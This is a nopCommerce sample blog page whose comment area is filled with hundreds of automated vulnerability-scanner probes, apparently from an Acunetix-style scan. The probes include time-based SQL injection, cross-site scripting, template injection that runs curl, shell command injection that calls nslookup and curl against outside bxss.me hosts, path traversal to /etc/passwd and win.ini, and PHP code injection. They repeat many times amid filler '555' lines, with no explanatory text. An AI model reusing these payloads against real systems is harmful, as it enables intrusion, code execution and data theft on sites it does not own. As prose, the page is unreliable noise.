About nopCommerce
Thursday, August 11, 2022
For full feature list go to nopCommerce.com
Providing outstanding custom search engine optimization, web development services and e-commerce development solutions to our clients at a fair price in a professional manner.
Leave your comment
This is a sample comment...
555
1DS58NVDT2R0
555
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
555
555
xfs.bxss.me
'"
555
<!--
555
555
555
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hitrxwkielbnd26d93.bxss.me")}}
-1 OR 5*5=25 --
response.write(9674827*9892853)
-1 OR 5*5=25
'+response.write(9674827*9892853)+'
"+response.write(9674827*9892853)+"
5559166190
<% response.write(9674827*9892853) %>
+response.write(9674827*9892853)'
555
bfg10142<s1﹥s2ʺs3ʹhjl10142
555
555
555
555
bfgx9376%C0%BEz1%C0%BCz2a%90bcxhjl9376
<%={{={@{#{${dfb}}%>
<th:t="${dfb}#foreach
/../../../../../../../../../../windows/system32/BITSADMIN.exe
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
dfb{{98991*97996}}xca
555
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
echo wsqogn$()\ uwwiob\nz^xyu||a #' &echo wsqogn$()\ uwwiob\nz^xyu||a #|" &echo wsqogn$()\ uwwiob\nz^xyu||a #
555*if(now()=sysdate(),sleep(15),0)
&echo povdbn$()\ fahigb\nz^xyu||a #' &echo povdbn$()\ fahigb\nz^xyu||a #|" &echo povdbn$()\ fahigb\nz^xyu||a #
555<WPBSBG>WLXZG[!+!]</WPBSBG>
555&echo xwepft$()\ qswaqo\nz^xyu||a #' &echo xwepft$()\ qswaqo\nz^xyu||a #|" &echo xwepft$()\ qswaqo\nz^xyu||a #
|echo pgshnv$()\ wjtqte\nz^xyu||a #' |echo pgshnv$()\ wjtqte\nz^xyu||a #|" |echo pgshnv$()\ wjtqte\nz^xyu||a #
555|echo sjabxo$()\ duxmjj\nz^xyu||a #' |echo sjabxo$()\ duxmjj\nz^xyu||a #|" |echo sjabxo$()\ duxmjj\nz^xyu||a #
expr 9000240867 - 939391
(nslookup -q=cname hitnaqtbfhtdw35efb.bxss.me||curl hitnaqtbfhtdw35efb.bxss.me))
$(nslookup -q=cname hitfrlhnecyui959f3.bxss.me||curl hitfrlhnecyui959f3.bxss.me)
&nslookup -q=cname hitutprxsongy0896a.bxss.me&'\"`0&nslookup -q=cname hitutprxsongy0896a.bxss.me&`'
&(nslookup -q=cname hitxzjtvdphxue8f9a.bxss.me||curl hitxzjtvdphxue8f9a.bxss.me)&'\"`0&(nslookup -q=cname hitxzjtvdphxue8f9a.bxss.me||curl hitxzjtvdphxue8f9a.bxss.me)&`'
|(nslookup -q=cname hitdlczypxjpl6ca6d.bxss.me||curl hitdlczypxjpl6ca6d.bxss.me)
`(nslookup -q=cname hittcmycrjgrve78a7.bxss.me||curl hittcmycrjgrve78a7.bxss.me)`
555<isindex type=image src=1 onerror=RIEa(9486)>
5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z
;(nslookup -q=cname hitlqlounpalsb5992.bxss.me||curl hitlqlounpalsb5992.bxss.me)|(nslookup -q=cname hitlqlounpalsb5992.bxss.me||curl hitlqlounpalsb5992.bxss.me)&(nslookup -q=cname hitlqlounpalsb5992.bxss.me||curl hitlqlounpalsb5992.bxss.me)
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9639'>
555
555
555<body onload=RIEa(9539)>
555
555
555
5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z
555<img src=//xss.bxss.me/t/dot.gif onload=RIEa(9608)>
555
555<img src=xyz OnErRor=RIEa(9310)>
555
555
555
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
555
555
555
555<img/src=">" onerror=alert(9495)>
%F6<img zzz onmouseover=RIEa(97871) //%F6>
555-1; waitfor delay '0:0:15' --
555<input autofocus onfocus=RIEa(9109)>
<a HrEF=http://xss.bxss.me></a>
555-1); waitfor delay '0:0:15' --
<a HrEF=jaVaScRiPT:>
555
555}body{zzz:Expre/**/SSion(RIEa(9537))}
555
555-1)); waitfor delay '0:0:15' --
555<W2NL4G>3WIIP[!+!]</W2NL4G>
eKGDLEHS
555<ifRAme sRc=9778.com></IfRamE>
bXAXVkv8: yFTEaXmD
555
555-1 waitfor delay '0:0:15' --
555<a1wSJ3J x=9746>
555
555<img sRc='http://attacker-9191/log.php?
555<a77awgw<
555
../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../windows/win.ini
file:///etc/passwd
555ij0uifJu'; waitfor delay '0:0:15' --
555
../555
555
555
555
555
555
555
555
555
555
555V2pp3m14'); waitfor delay '0:0:15' --
555
555
555
555
555rLNTE1EV')); waitfor delay '0:0:15' --
555
555
555
redirtest.acx
555
https://datemarketplace.softpos-ksa.com/
555
555
555
555-1 OR 635=(SELECT 635 FROM PG_SLEEP(15))--
"+"A".concat(70-3).concat(22*4).concat(104).concat(80).concat(107).concat(90)+(require"socket"
Socket.gethostbyname("hitcl"+"hpbdpdkgcfeba.bxss.me.")[3].to_s)+"
555
555
'+'A'.concat(70-3).concat(22*4).concat(111).concat(83).concat(113).concat(71)+(require'socket'
Socket.gethostbyname('hitmd'+'bmmcimugbb839.bxss.me.')[3].to_s)+'
'A'.concat(70-3).concat(22*4).concat(121).concat(88).concat(110).concat(79)+(require'socket'
Socket.gethostbyname('hitgp'+'nxesdwatce2c9.bxss.me.')[3].to_s)
555<esi:include src="http://bxss.me/rpb.png"/>
555
555
555
555
555
555
555
555
'.gethostbyname(lc('hitbr'.'hsnkjwju77b53.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(112).chr(88).chr(107).chr(68).'
555
".gethostbyname(lc("hitry"."oxcudkgt54d1d.bxss.me."))."A".chr(67).chr(hex("58")).chr(121).chr(72).chr(107).chr(86)."
gethostbyname(lc('hitsi'.'wqfmjsbec6b9d.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(120).chr(88).chr(119).chr(65)
555
555
555
555
555
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
';print(md5(31337));$a='
555
";print(md5(31337));$a="
555
555
'.print(md5(31337)).'
555
555
555
555
555
555
555
HttP://bxss.me/t/xss.html?%00
bxss.me/t/xss.html?%00
555
555
555
555
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555
555
555
555
'"()
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
555'&&sleep(27*1000)*jtzyfh&&'
555
555
555"&&sleep(27*1000)*tmxmvs&&"
555'"
555'||sleep(27*1000)*ffdmdr||'
about-nopcommerce
555%C0%A7%C0%A2%2527%2522\'\"
555"||sleep(27*1000)*vurqbo||"
@@ffUuQ
(select 198766*667891)
about-nopcommerce/.
555
555
555
(select 198766*667891 from DUAL)
555
555
555
555
555
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
555
555
555
555&n944021=v959519
555
555
555
/etc/shells
555
555
555
555
../../../../../../../../../../../../../../etc/shells
555
c:/windows/win.ini
555
)
!(()&&!|*|*|
bxss.me
Http://bxss.me/t/fit.txt
555
http://bxss.me/t/fit.txt?.jpg
555
^(#$!@#$)(()))******
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
555
555
-1 OR 5*5=25 --
-1 OR 5*5=25
'"
xfs.bxss.me
<!--
555
555
555
/../../../../../../../../../../windows/system32/BITSADMIN.exe
555
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hitkmzzmjdjwdaefd3.bxss.me")}}
response.write(9195912*9033318)
'+response.write(9195912*9033318)+'
echo jqpmrg$()\ wlfiqp\nz^xyu||a #' &echo jqpmrg$()\ wlfiqp\nz^xyu||a #|" &echo jqpmrg$()\ wlfiqp\nz^xyu||a #
"+response.write(9195912*9033318)+"
&echo vbczfy$()\ tsjwnw\nz^xyu||a #' &echo vbczfy$()\ tsjwnw\nz^xyu||a #|" &echo vbczfy$()\ tsjwnw\nz^xyu||a #
<% response.write(9195912*9033318) %>
555&echo vcebaw$()\ iihxkm\nz^xyu||a #' &echo vcebaw$()\ iihxkm\nz^xyu||a #|" &echo vcebaw$()\ iihxkm\nz^xyu||a #
+response.write(9195912*9033318)'
|echo sbrxzb$()\ iovzcy\nz^xyu||a #' |echo sbrxzb$()\ iovzcy\nz^xyu||a #|" |echo sbrxzb$()\ iovzcy\nz^xyu||a #
555
555|echo dywvlk$()\ bvtzap\nz^xyu||a #' |echo dywvlk$()\ bvtzap\nz^xyu||a #|" |echo dywvlk$()\ bvtzap\nz^xyu||a #
YYccIRmD
expr 9000411003 - 937403
3WBQKJNL: mhK2W4Yf
(nslookup -q=cname hitjqmzemlkxi64c1b.bxss.me||curl hitjqmzemlkxi64c1b.bxss.me))
555
$(nslookup -q=cname hitvhrhzhwlng6ec97.bxss.me||curl hitvhrhzhwlng6ec97.bxss.me)
555
555
5559180224
555*if(now()=sysdate(),sleep(15),0)
555
555
555
&nslookup -q=cname hitxjlebiyflucb234.bxss.me&'\"`0&nslookup -q=cname hitxjlebiyflucb234.bxss.me&`'
bfg9925<s1﹥s2ʺs3ʹhjl9925
&(nslookup -q=cname hitybyyhosqhua5d92.bxss.me||curl hitybyyhosqhua5d92.bxss.me)&'\"`0&(nslookup -q=cname hitybyyhosqhua5d92.bxss.me||curl hitybyyhosqhua5d92.bxss.me)&`'
../../../../../../../../../../../../../../etc/passwd
|(nslookup -q=cname hitmsrlpvmdou79854.bxss.me||curl hitmsrlpvmdou79854.bxss.me)
../../../../../../../../../../../../../../windows/win.ini
`(nslookup -q=cname hitjyuwmecqps7fbf1.bxss.me||curl hitjyuwmecqps7fbf1.bxss.me)`
file:///etc/passwd
;(nslookup -q=cname hitiulsjwwcctaceca.bxss.me||curl hitiulsjwwcctaceca.bxss.me)|(nslookup -q=cname hitiulsjwwcctaceca.bxss.me||curl hitiulsjwwcctaceca.bxss.me)&(nslookup -q=cname hitiulsjwwcctaceca.bxss.me||curl hitiulsjwwcctaceca.bxss.me)
bfgx1038%C0%BEz1%C0%BCz2a%90bcxhjl1038
555
5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z
../555
555
555
555
555
555
5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z
555
<%={{={@{#{${dfb}}%>
555
555
555
555
<th:t="${dfb}#foreach
555
555
555
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
555
555
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
555
555
555
555
555
555-1; waitfor delay '0:0:15' --
redirtest.acx
https://datemarketplace.softpos-ksa.com/
dfb{{98991*97996}}xca
555
555
555
555-1); waitfor delay '0:0:15' --
"+"A".concat(70-3).concat(22*4).concat(101).concat(87).concat(99).concat(67)+(require"socket"
Socket.gethostbyname("hitib"+"etzdtgztef128.bxss.me.")[3].to_s)+"
555
555<esi:include src="http://bxss.me/rpb.png"/>
555-1)); waitfor delay '0:0:15' --
'+'A'.concat(70-3).concat(22*4).concat(104).concat(70).concat(122).concat(70)+(require'socket'
Socket.gethostbyname('hityd'+'lvhctjgy820f1.bxss.me.')[3].to_s)+'
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
'A'.concat(70-3).concat(22*4).concat(111).concat(82).concat(112).concat(83)+(require'socket'
Socket.gethostbyname('hitbw'+'rtpwcnvt6fffb.bxss.me.')[3].to_s)
555
555
555
555
'.gethostbyname(lc('hitwq'.'jxfjcjqe4bbfe.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(116).chr(90).chr(103).chr(89).'
".gethostbyname(lc("hitru"."jzjarkgzeaafd.bxss.me."))."A".chr(67).chr(hex("58")).chr(108).chr(69).chr(115).chr(69)."
gethostbyname(lc('hitax'.'tldmgqbm81f88.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(118).chr(80).chr(107).chr(82)
555
555
555-1 waitfor delay '0:0:15' --
555
555
555<WAE0NY>3CTLD[!+!]</WAE0NY>
555
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
555ijM4b8ZL'; waitfor delay '0:0:15' --
';print(md5(31337));$a='
555kmFjMwPm'); waitfor delay '0:0:15' --
";print(md5(31337));$a="
'.print(md5(31337)).'
555
HttP://bxss.me/t/xss.html?%00
555
bxss.me/t/xss.html?%00
555
555
555A5IK6OBN')); waitfor delay '0:0:15' --
555
555-1 OR 15=(SELECT 15 FROM PG_SLEEP(15))--
555
555
about-nopcommerce
555<isindex type=image src=1 onerror=scdA(9466)>
about-nopcommerce/.
'"()
555'&&sleep(27*1000)*apabnk&&'
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9492'>
555"&&sleep(27*1000)*rxcyes&&"
555'||sleep(27*1000)*tkksln||'
555
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
555"||sleep(27*1000)*aqdqpm||"
/etc/shells
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
../../../../../../../../../../../../../../etc/shells
c:/windows/win.ini
555
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
bxss.me
555
555<body onload=scdA(9679)>
555
Http://bxss.me/t/fit.txt
555&n980794=v985918
http://bxss.me/t/fit.txt?.jpg
555
555<img src=//xss.bxss.me/t/dot.gif onload=scdA(9454)>
555
555'"
555
555%C0%A7%C0%A2%2527%2522\'\"
555
@@Bacho
555<img src=xyz OnErRor=scdA(9449)>
555
(select 198766*667891)
)
555
(select 198766*667891 from DUAL)
555
555
555
555
555
555
555<img/src=">" onerror=alert(9216)>
555
555
555
!(()&&!|*|*|
555
^(#$!@#$)(()))******
555
555
555
555
555
555
555
%F6<img zzz onmouseover=scdA(93571) //%F6>
555
555
555
555<input autofocus onfocus=scdA(9695)>
555
555
555
555
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hitilvgvvdtmcf9bfd.bxss.me")}}
555
555
555
<a HrEF=http://xss.bxss.me></a>
555
555
555
5559866965
555
<a HrEF=jaVaScRiPT:>
555
555
555
555
555
555}body{zzz:Expre/**/SSion(scdA(9047))}
555
555<WM5R3H>N38IP[!+!]</WM5R3H>
555<ifRAme sRc=9052.com></IfRamE>
555
555
555<aDjl2Mk x=9459>
555<img sRc='http://attacker-9163/log.php?
555
555
555<aP2sJju<
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hitxplnqehcceeb8fa.bxss.me")}}
555
5559513688
555
555
bfg5982<s1﹥s2ʺs3ʹhjl5982
bfgx4159%C0%BEz1%C0%BCz2a%90bcxhjl4159
555
<%={{={@{#{${dfb}}%>
555
<th:t="${dfb}#foreach
555
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
555
dfb{{98991*97996}}xca
555
555
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
555
555<WV1UMI>NEHBX[!+!]</WV1UMI>
555<isindex type=image src=1 onerror=8BIy(9772)>
555
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9721'>
555
555<body onload=8BIy(9110)>
555
555<img src=//xss.bxss.me/t/dot.gif onload=8BIy(9246)>
555
555<img src=xyz OnErRor=8BIy(9353)>
555
555<img/src=">" onerror=alert(9240)>
555
%F6<img zzz onmouseover=8BIy(90531) //%F6>
555
555<input autofocus onfocus=8BIy(9617)>
555
<a HrEF=http://xss.bxss.me></a>
555
<a HrEF=jaVaScRiPT:>
555
555}body{zzz:Expre/**/SSion(8BIy(9025))}
555
555<WGED4S>IAHGR[!+!]</WGED4S>
555
555<ifRAme sRc=9313.com></IfRamE>
555
555<aHjS5KZ x=9250>
555
555<img sRc='http://attacker-9507/log.php?
555
555<agoBaJy<
555
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
xfs.bxss.me
'"
<!--
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hitdcpcntsvnb97cbd.bxss.me")}}
9474920
-1 OR 5*5=25 --
-1 OR 5*5=26 --
-1 OR 5*5=25
-1 OR 5*5=26
response.write(9378901*9390509)
'+response.write(9378901*9390509)+'
"+response.write(9378901*9390509)+"
<% response.write(9378901*9390509) %>
+response.write(9378901*9390509)'
bfg10204<s1﹥s2ʺs3ʹhjl10204
/../../../../../../../../../../windows/system32/BITSADMIN.exe
bfgx9197%C0%BEz1%C0%BCz2a%90bcxhjl9197
*if(now()=sysdate(),sleep(15),0)
<%={{={@{#{${dfb}}%>
0'XOR(
*if(now()=sysdate(),sleep(15),0))XOR'Z
<th:t="${dfb}#foreach
0"XOR(
*if(now()=sysdate(),sleep(15),0))XOR"Z
echo grtebi$()\ oaztru\nz^xyu||a #' &echo grtebi$()\ oaztru\nz^xyu||a #|" &echo grtebi$()\ oaztru\nz^xyu||a #
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
&echo ttpzty$()\ kkyvlm\nz^xyu||a #' &echo ttpzty$()\ kkyvlm\nz^xyu||a #|" &echo ttpzty$()\ kkyvlm\nz^xyu||a #
|echo jfxkip$()\ exioet\nz^xyu||a #' |echo jfxkip$()\ exioet\nz^xyu||a #|" |echo jfxkip$()\ exioet\nz^xyu||a #
expr 9000695965 - 958003
(nslookup -q=cname hitfkfyjvssiac54b7.bxss.me||curl hitfkfyjvssiac54b7.bxss.me))
$(nslookup -q=cname hitscaqjgchpue03d9.bxss.me||curl hitscaqjgchpue03d9.bxss.me)
&nslookup -q=cname hitcpxpxsfkufb8a12.bxss.me&'\"`0&nslookup -q=cname hitcpxpxsfkufb8a12.bxss.me&`'
&(nslookup -q=cname hithpiahxtcrv7a74e.bxss.me||curl hithpiahxtcrv7a74e.bxss.me)&'\"`0&(nslookup -q=cname hithpiahxtcrv7a74e.bxss.me||curl hithpiahxtcrv7a74e.bxss.me)&`'
|(nslookup -q=cname hituycsuqqyws26840.bxss.me||curl hituycsuqqyws26840.bxss.me)
`(nslookup -q=cname hitysfacgwxxsf9bfe.bxss.me||curl hitysfacgwxxsf9bfe.bxss.me)`
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
;(nslookup -q=cname hithrgupnskwie50bb.bxss.me||curl hithrgupnskwie50bb.bxss.me)|(nslookup -q=cname hithrgupnskwie50bb.bxss.me||curl hithrgupnskwie50bb.bxss.me)&(nslookup -q=cname hithrgupnskwie50bb.bxss.me||curl hithrgupnskwie50bb.bxss.me)
dfb{{98991*97996}}xca
-1; waitfor delay '0:0:15' --
RGo698uY
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
ctXU4QoT: S6Vjtzyv
-1); waitfor delay '0:0:15' --
<WMWW1F>2OVZF[!+!]</WMWW1F>
-1)); waitfor delay '0:0:15' --
-1 waitfor delay '0:0:15' --
../../../../../../../../../../../../../../etc/passwd
redirtest.acx
https://datemarketplace.softpos-ksa.com/
../../../../../../../../../../../../../../windows/win.ini
<isindex type=image src=1 onerror=NYOR(9970)>
<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9728'>
file:///etc/passwd
HRd6C8QN'; waitfor delay '0:0:15' --
<body onload=NYOR(9027)>
../
./
"+"A".concat(70-3).concat(22*4).concat(110).concat(84).concat(120).concat(81)+(require"socket"
Socket.gethostbyname("hitvb"+"hdwundnmca731.bxss.me.")[3].to_s)+"
<img src=//xss.bxss.me/t/dot.gif onload=NYOR(9783)>
'+'A'.concat(70-3).concat(22*4).concat(112).concat(82).concat(118).concat(66)+(require'socket'
Socket.gethostbyname('hitfy'+'jidqqfor652c5.bxss.me.')[3].to_s)+'
'A'.concat(70-3).concat(22*4).concat(101).concat(90).concat(113).concat(70)+(require'socket'
Socket.gethostbyname('hithf'+'ofylgbqvb91ec.bxss.me.')[3].to_s)
levwaYtm'); waitfor delay '0:0:15' --
<img src=xyz OnErRor=NYOR(9212)>
<esi:include src="http://bxss.me/rpb.png"/>
<img/src=">" onerror=alert(9402)>
XMOHjdN8')); waitfor delay '0:0:15' --
'.gethostbyname(lc('hitiq'.'cofizgrib79c6.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(99).chr(86).chr(103).chr(79).'
%F6<img zzz onmouseover=NYOR(93051) //%F6>
-1 OR 731=(SELECT 731 FROM PG_SLEEP(15))--
".gethostbyname(lc("hitoo"."hnkgupaa4d9ef.bxss.me."))."A".chr(67).chr(hex("58")).chr(108).chr(83).chr(97).chr(72)."
gethostbyname(lc('hitxr'.'oirjhxid04c5c.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(114).chr(89).chr(115).chr(74)
<input autofocus onfocus=NYOR(9297)>
<a HrEF=http://xss.bxss.me></a>
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
';print(md5(31337));$a='
<a HrEF=jaVaScRiPT:>
";print(md5(31337));$a="
}body{zzz:Expre/**/SSion(NYOR(9070))}
'.print(md5(31337)).'
<WKVGC0>BYSGI[!+!]</WKVGC0>
<ifRAme sRc=9225.com></IfRamE>
<aZFHu9P x=9327>
ctime
sleep
p0
(I30
tp1
Rp2
.
<img sRc='http://attacker-9927/log.php?
HttP://bxss.me/t/xss.html?%00
bxss.me/t/xss.html?%00
<aDVzhwe<
'"()
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
'&&sleep(27*1000)*zitops&&'
about-nopcommerce
"&&sleep(27*1000)*vkyrud&&"
'||sleep(27*1000)*guxdaw||'
about-nopcommerce/.
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
"||sleep(27*1000)*likcsb||"
'"
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
%C0%A7%C0%A2%2527%2522\'\"
@@h4d21
(select 198766*667891)
/etc/shells
../../../../../../../../../../../../../../etc/shells
&n923785=v947664
c:/windows/win.ini
(select 198766*667891 from DUAL)
bxss.me
Http://bxss.me/t/fit.txt
http://bxss.me/t/fit.txt?.jpg
)
!(()&&!|*|*|
^(#$!@#$)(()))******
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hituqcdvkihap2bef0.bxss.me")}}
5559860788
555
bfg6416<s1﹥s2ʺs3ʹhjl6416
bfgx9867%C0%BEz1%C0%BCz2a%90bcxhjl9867
555
<%={{={@{#{${dfb}}%>
555
555
<th:t="${dfb}#foreach
555
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
555
dfb{{98991*97996}}xca
555
555
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
555
555<WIRIGG>NJANU[!+!]</WIRIGG>
555
555<isindex type=image src=1 onerror=d13E(9031)>
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9592'>
555
555
555<body onload=d13E(9434)>
555
555<img src=//xss.bxss.me/t/dot.gif onload=d13E(9304)>
555<img src=xyz OnErRor=d13E(9265)>
555
555<img/src=">" onerror=alert(9744)>
555
555
%F6<img zzz onmouseover=d13E(97341) //%F6>
555<input autofocus onfocus=d13E(9803)>
555
<a HrEF=http://xss.bxss.me></a>
555
<a HrEF=jaVaScRiPT:>
555
555}body{zzz:Expre/**/SSion(d13E(9141))}
555
555<W26JZJ>GORBW[!+!]</W26JZJ>
555
555<ifRAme sRc=9305.com></IfRamE>
555<aiYb2yK x=9620>
555
555<img sRc='http://attacker-9748/log.php?
555
555<a4gSJIH<
555
555
555
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hitabsofmxfupaf775.bxss.me")}}
555
5559376379
555
bfg6206<s1﹥s2ʺs3ʹhjl6206
555
bfgx5458%C0%BEz1%C0%BCz2a%90bcxhjl5458
555
<%={{={@{#{${dfb}}%>
555
<th:t="${dfb}#foreach
555
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
555
dfb{{98991*97996}}xca
555
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
555
555<W8DBUH>K0USA[!+!]</W8DBUH>
555
555
555
555
555<isindex type=image src=1 onerror=lDMt(9819)>
555
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9541'>
555<body onload=lDMt(9959)>
555
555<img src=//xss.bxss.me/t/dot.gif onload=lDMt(9186)>
555
555<img src=xyz OnErRor=lDMt(9009)>
555<img/src=">" onerror=alert(9833)>
555
%F6<img zzz onmouseover=lDMt(93731) //%F6>
555
555<input autofocus onfocus=lDMt(9843)>
555
<a HrEF=http://xss.bxss.me></a>
555
<a HrEF=jaVaScRiPT:>
555
555}body{zzz:Expre/**/SSion(lDMt(9784))}
555
555<W3OWHF>PJYZN[!+!]</W3OWHF>
555
555<ifRAme sRc=9333.com></IfRamE>
555
555<anXtSsp x=9701>
555
555<img sRc='http://attacker-9677/log.php?
555
555<auMk53n<


)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))


xfs.bxss.me




response.write(9507234*9689845)
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hithclhmqwwywfc2ca.bxss.me")}}
'+response.write(9507234*9689845)+'
'"


"+response.write(9507234*9689845)+"
<!--
-1 OR 5*5=25 --


-1 OR 5*5=25


<% response.write(9507234*9689845) %>

9373753
+response.write(9507234*9689845)'


/../../../../../../../../../../windows/system32/BITSADMIN.exe
bfg10176<s1﹥s2ʺs3ʹhjl10176




bfgx10281%C0%BEz1%C0%BCz2a%90bcxhjl10281


echo qdikdd$()\ wngzcr\nz^xyu||a #' &echo qdikdd$()\ wngzcr\nz^xyu||a #|" &echo qdikdd$()\ wngzcr\nz^xyu||a #
&echo zkwvru$()\ hwshbc\nz^xyu||a #' &echo zkwvru$()\ hwshbc\nz^xyu||a #|" &echo zkwvru$()\ hwshbc\nz^xyu||a #
<%={{={@{#{${dfb}}%>




|echo seaemo$()\ plnocf\nz^xyu||a #' |echo seaemo$()\ plnocf\nz^xyu||a #|" |echo seaemo$()\ plnocf\nz^xyu||a #
if(now()=sysdate(),sleep(15),0)
expr 9000585383 - 912971
(nslookup -q=cname hiturwsrnclds8fc5a.bxss.me||curl hiturwsrnclds8fc5a.bxss.me))
$(nslookup -q=cname hittwnqhfgjxb270a5.bxss.me||curl hittwnqhfgjxb270a5.bxss.me)
<th:t="${dfb}#foreach
&nslookup -q=cname hitmxtdrgegvz1068b.bxss.me&'\"`0&nslookup -q=cname hitmxtdrgegvz1068b.bxss.me&`'
&(nslookup -q=cname hitdosmupakmi29e37.bxss.me||curl hitdosmupakmi29e37.bxss.me)&'\"`0&(nslookup -q=cname hitdosmupakmi29e37.bxss.me||curl hitdosmupakmi29e37.bxss.me)&`'
|(nslookup -q=cname hitjkqnlvlxmvca39a.bxss.me||curl hitjkqnlvlxmvca39a.bxss.me)
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
`(nslookup -q=cname hitdjhrkrrgjn42b02.bxss.me||curl hitdjhrkrrgjn42b02.bxss.me)`
;(nslookup -q=cname hitqmmyxseahub6306.bxss.me||curl hitqmmyxseahub6306.bxss.me)|(nslookup -q=cname hitqmmyxseahub6306.bxss.me||curl hitqmmyxseahub6306.bxss.me)&(nslookup -q=cname hitqmmyxseahub6306.bxss.me||curl hitqmmyxseahub6306.bxss.me)



0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
dfb{{98991*97996}}xca












"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")











0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

<WV2I9Y>SCUMV[!+!]</WV2I9Y>
6dCq1Cb3
KyhdZeV3: mpYm2aNw




(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

<isindex type=image src=1 onerror=02e4(9300)>

<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9678'>
../../../../../../../../../../../../../../etc/passwd

<body onload=02e4(9175)>
../../../../../../../../../../../../../../windows/win.ini

-1; waitfor delay '0:0:15' --
file:///etc/passwd


../



<img src=//xss.bxss.me/t/dot.gif onload=02e4(9703)>





<img src=xyz OnErRor=02e4(9188)>









<img/src=">" onerror=alert(9751)>

-1); waitfor delay '0:0:15' --




%F6<img zzz onmouseover=02e4(94331) //%F6>

<input autofocus onfocus=02e4(9489)>

